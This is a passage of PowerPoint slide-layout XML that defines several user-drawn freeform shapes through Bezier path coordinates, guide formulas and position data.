                      <a:pt x="0" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="31"/>
                      <a:pt x="10" y="29"/>
                      <a:pt x="16" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="24"/>
                      <a:pt x="27" y="21"/>
                      <a:pt x="32" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37"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265"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7739" y="7"/>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4"/>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Freeform 266"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3986" y="0"/>
                <a:ext cx="219"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59 h 209"/>
                  <a:gd name="T12" fmla="*/ 9 w 179"/>
                  <a:gd name="T13" fmla="*/ 163 h 209"/>
                  <a:gd name="T14" fmla="*/ 6 w 179"/>
                  <a:gd name="T15" fmla="*/ 184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59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9 h 209"/>
                  <a:gd name="T84" fmla="*/ 86 w 179"/>
                  <a:gd name="T85" fmla="*/ 42 h 209"/>
                  <a:gd name="T86" fmla="*/ 78 w 179"/>
                  <a:gd name="T87" fmla="*/ 44 h 209"/>
                  <a:gd name="T88" fmla="*/ 65 w 179"/>
                  <a:gd name="T89" fmla="*/ 35 h 209"/>
                  <a:gd name="T90" fmla="*/ 67 w 179"/>
                  <a:gd name="T91" fmla="*/ 48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6"/>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09" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="198"/>
                      <a:pt x="90" y="198"/>
                      <a:pt x="80" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="199"/>
                      <a:pt x="72" y="199"/>
                      <a:pt x="68" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="209"/>
                      <a:pt x="53" y="209"/>
                      <a:pt x="48" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="206"/>
                      <a:pt x="38" y="204"/>
                      <a:pt x="32" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="200"/>
                      <a:pt x="18" y="199"/>
                      <a:pt x="11" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="197"/>
                      <a:pt x="7" y="196"/>
                      <a:pt x="5" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="194"/>
                      <a:pt x="0" y="192"/>
                      <a:pt x="1" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="187"/>
                      <a:pt x="2" y="185"/>
                      <a:pt x="2" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="180"/>
                      <a:pt x="4" y="176"/>
                      <a:pt x="3" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="170"/>
                      <a:pt x="2" y="169"/>
                      <a:pt x="2" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="163"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="7" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="160"/>
                      <a:pt x="12" y="160"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="153"/>
                      <a:pt x="23" y="160"/>
                      <a:pt x="17" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="163"/>
                      <a:pt x="12" y="163"/>
                      <a:pt x="9" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="163"/>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="3" y="164"/>
                      <a:pt x="4" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="169"/>
                      <a:pt x="5" y="171"/>
                      <a:pt x="6" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="176"/>
                      <a:pt x="8" y="180"/>
                      <a:pt x="6" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="4" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="4" y="192"/>
                      <a:pt x="6" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="193"/>
                      <a:pt x="11" y="194"/>
                      <a:pt x="13" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="196"/>
                      <a:pt x="35" y="199"/>
                      <a:pt x="45" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="203"/>
                      <a:pt x="52" y="204"/>
                      <a:pt x="55" y="204"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="202"/>
                      <a:pt x="66" y="198"/>
                      <a:pt x="64" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="186"/>
                      <a:pt x="62" y="182"/>
                      <a:pt x="60" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="170"/>
                      <a:pt x="49" y="161"/>
                      <a:pt x="42" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="150"/>
                      <a:pt x="37" y="147"/>
                      <a:pt x="35" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="143"/>
                      <a:pt x="29" y="143"/>
                      <a:pt x="27" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="25" y="145"/>
                      <a:pt x="25" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="140"/>
                      <a:pt x="24" y="137"/>
                      <a:pt x="25" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="133"/>
                      <a:pt x="26" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="32"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7"/>
                      <a:pt x="63" y="8"/>
                      <a:pt x="73" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="1"/>
                      <a:pt x="81" y="0"/>
                      <a:pt x="85" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="0"/>
                      <a:pt x="97" y="1"/>
                      <a:pt x="102" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="109" y="6"/>
                      <a:pt x="114" y="11"/>
                      <a:pt x="117" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="24"/>
                      <a:pt x="122" y="30"/>
                      <a:pt x="122" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="40"/>
                      <a:pt x="122" y="44"/>
                      <a:pt x="123" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="61"/>
                      <a:pt x="128" y="75"/>
                      <a:pt x="138" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="97"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="159" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="133"/>
                      <a:pt x="161" y="138"/>
                      <a:pt x="160" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="145"/>
                      <a:pt x="159" y="146"/>
                      <a:pt x="159" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="158" y="147"/>
                      <a:pt x="158" y="148"/>
                      <a:pt x="157" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="149"/>
                      <a:pt x="154" y="151"/>
                      <a:pt x="153" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="154"/>
                      <a:pt x="149" y="157"/>
                      <a:pt x="147" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="143" y="161"/>
                      <a:pt x="139" y="161"/>
                      <a:pt x="135" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="159"/>
                      <a:pt x="132" y="158"/>
                      <a:pt x="131" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="154"/>
                      <a:pt x="129" y="152"/>
                      <a:pt x="128" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="149"/>
                      <a:pt x="126" y="148"/>
                      <a:pt x="124" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="148"/>
                      <a:pt x="122" y="150"/>
                      <a:pt x="121" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="155"/>
                      <a:pt x="120" y="159"/>
                      <a:pt x="121" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="171"/>
                      <a:pt x="123" y="179"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="189"/>
                      <a:pt x="121" y="192"/>
                      <a:pt x="122" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="202"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="136" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="202"/>
                      <a:pt x="142" y="200"/>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5"/>
                      <a:pt x="160" y="154"/>
                      <a:pt x="161" y="153"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="71"/>
                      <a:pt x="74" y="73"/>
                      <a:pt x="77" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="74"/>
                      <a:pt x="85" y="73"/>
                      <a:pt x="88" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="70"/>
                      <a:pt x="94" y="68"/>
                      <a:pt x="97" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="98" y="66"/>
                      <a:pt x="100" y="66"/>
                      <a:pt x="101" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="66"/>
                      <a:pt x="102" y="66"/>
                      <a:pt x="102" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="67"/>
                      <a:pt x="102" y="68"/>
                      <a:pt x="101" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="69"/>
                      <a:pt x="100" y="69"/>
                      <a:pt x="99" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="72"/>
                      <a:pt x="90" y="75"/>
                      <a:pt x="86" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="79"/>
                      <a:pt x="83" y="80"/>
                      <a:pt x="81" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="82"/>
                      <a:pt x="75" y="82"/>
                      <a:pt x="73" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="69" y="74"/>
                      <a:pt x="67" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="71"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="65" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="71"/>
                      <a:pt x="65" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="73"/>
                      <a:pt x="64" y="75"/>
                      <a:pt x="63" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="79"/>
                      <a:pt x="61" y="81"/>
                      <a:pt x="60" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="86"/>
                      <a:pt x="57" y="89"/>
                      <a:pt x="57" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="94"/>
                      <a:pt x="58" y="96"/>
                      <a:pt x="58" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="99"/>
                      <a:pt x="57" y="100"/>
                      <a:pt x="56" y="101"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="105"/>
                      <a:pt x="51" y="109"/>
                      <a:pt x="50" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="117"/>
                      <a:pt x="46" y="122"/>
                      <a:pt x="46" y="127"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="130"/>
                      <a:pt x="46" y="133"/>
                      <a:pt x="46" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="138"/>
                      <a:pt x="45" y="139"/>
                      <a:pt x="45" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="142"/>
                      <a:pt x="43" y="142"/>
                      <a:pt x="42" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="140"/>
                      <a:pt x="41" y="139"/>
                      <a:pt x="40" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="134"/>
                      <a:pt x="37" y="130"/>
                      <a:pt x="37" y="125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="124"/>
                      <a:pt x="38" y="122"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="121"/>
                      <a:pt x="38" y="121"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="123"/>
                      <a:pt x="36" y="123"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="127"/>
                      <a:pt x="35" y="131"/>
                      <a:pt x="36" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="138"/>
                      <a:pt x="38" y="141"/>
                      <a:pt x="40" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="146"/>
                      <a:pt x="48" y="150"/>
                      <a:pt x="52" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="157"/>
                      <a:pt x="62" y="161"/>
                      <a:pt x="67" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="167"/>
                      <a:pt x="69" y="170"/>
                      <a:pt x="69" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="175"/>
                      <a:pt x="67" y="177"/>
                      <a:pt x="64" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="178"/>
                      <a:pt x="63" y="178"/>
                      <a:pt x="62" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="180"/>
                      <a:pt x="64" y="182"/>
                      <a:pt x="66" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="186"/>
                      <a:pt x="69" y="189"/>
                      <a:pt x="69" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="194"/>
                      <a:pt x="70" y="196"/>
                      <a:pt x="70" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70"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3" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="173"/>
                      <a:pt x="115" y="173"/>
                      <a:pt x="115" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="173"/>
                      <a:pt x="116" y="174"/>
                      <a:pt x="117" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="179"/>
                      <a:pt x="116" y="182"/>
                      <a:pt x="115" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="188"/>
                      <a:pt x="114" y="191"/>
                      <a:pt x="113" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113" y="195"/>
                      <a:pt x="114" y="196"/>
                      <a:pt x="116" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="191"/>
                      <a:pt x="118" y="187"/>
                      <a:pt x="119" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="179"/>
                      <a:pt x="120" y="175"/>
                      <a:pt x="119" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="167"/>
                      <a:pt x="118" y="164"/>
                      <a:pt x="118" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="157"/>
                      <a:pt x="118" y="153"/>
                      <a:pt x="119" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="148"/>
                      <a:pt x="122" y="146"/>
                      <a:pt x="125" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="142"/>
                      <a:pt x="129" y="140"/>
                      <a:pt x="132" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="138"/>
                      <a:pt x="141" y="139"/>
                      <a:pt x="146" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="138"/>
                      <a:pt x="142" y="138"/>
                      <a:pt x="140" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="119"/>
                      <a:pt x="135"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2" y="103"/>
                      <a:pt x="121" y="99"/>
                      <a:pt x="117" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="86"/>
                      <a:pt x="112" y="79"/>
                      <a:pt x="107" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="70"/>
                      <a:pt x="105" y="67"/>
                      <a:pt x="105"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1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="38"/>
                      <a:pt x="95" y="37"/>
                      <a:pt x="98" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="37"/>
                      <a:pt x="101" y="38"/>
                      <a:pt x="102" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="43"/>
                      <a:pt x="103" y="45"/>
                      <a:pt x="102" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="49"/>
                      <a:pt x="101" y="50"/>
                      <a:pt x="102" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="51"/>
                      <a:pt x="107" y="50"/>
                      <a:pt x="107" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="44"/>
                      <a:pt x="107" y="40"/>
                      <a:pt x="105" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="32"/>
                      <a:pt x="100" y="30"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="31"/>
                      <a:pt x="88" y="33"/>
                      <a:pt x="87" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="39"/>
                      <a:pt x="86" y="41"/>
                      <a:pt x="86" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="44"/>
                      <a:pt x="87" y="45"/>
                      <a:pt x="87" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="46"/>
                      <a:pt x="83" y="46"/>
                      <a:pt x="80" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                      <a:pt x="79" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="46"/>
                      <a:pt x="78" y="46"/>
                      <a:pt x="78" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="42"/>
                      <a:pt x="77" y="39"/>
                      <a:pt x="76" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="36"/>
                      <a:pt x="76" y="35"/>
                      <a:pt x="76" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="33"/>
                      <a:pt x="73" y="31"/>
                      <a:pt x="70" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="31"/>
                      <a:pt x="66" y="33"/>
                      <a:pt x="65" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="40"/>
                      <a:pt x="63" y="45"/>
                      <a:pt x="66" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="51"/>
                      <a:pt x="67" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="69" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="49"/>
                      <a:pt x="68" y="48"/>
                      <a:pt x="67" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="45"/>
                      <a:pt x="65" y="43"/>
                      <a:pt x="66" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="37"/>
                      <a:pt x="71" y="36"/>
                      <a:pt x="73" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74"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2"/>
                      <a:pt x="68" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="66"/>
                      <a:pt x="74" y="67"/>
                      <a:pt x="78" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="66"/>
                      <a:pt x="86" y="65"/>
                      <a:pt x="91" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="63"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="102" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="64"/>
                      <a:pt x="91" y="66"/>
                      <a:pt x="86" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="69"/>
                      <a:pt x="78" y="70"/>
                      <a:pt x="74" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="69"/>
                      <a:pt x="72" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="43"/>
                      <a:pt x="73" y="42"/>
                      <a:pt x="72" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                      <a:pt x="70" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="40"/>
                      <a:pt x="70" y="41"/>
                      <a:pt x="70" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="42"/>
                      <a:pt x="71" y="43"/>
                      <a:pt x="71" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="45"/>
                      <a:pt x="72" y="45"/>
                      <a:pt x="73" y="45"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="40"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="40"/>
                      <a:pt x="99" y="42"/>
                      <a:pt x="100" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="44"/>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="42"/>
                      <a:pt x="100" y="40"/>
                      <a:pt x="99" y="40"/>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267"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4077" y="59"/>
                <a:ext cx="2"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1"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Freeform 268"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4089" y="59"/>
                <a:ext cx="4" cy="2"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3"/>
                  <a:gd name="T1" fmla="*/ 0 h 2"/>
                  <a:gd name="T2" fmla="*/ 3 w 3"/>
                  <a:gd name="T3" fmla="*/ 0 h 2"/>
                  <a:gd name="T4" fmla="*/ 3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0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="0"/>
                      <a:pt x="3" y="1"/>
                      <a:pt x="3"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Freeform 269"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="20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Freeform 270"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="222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271"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="242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Freeform 272"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2620"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273"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
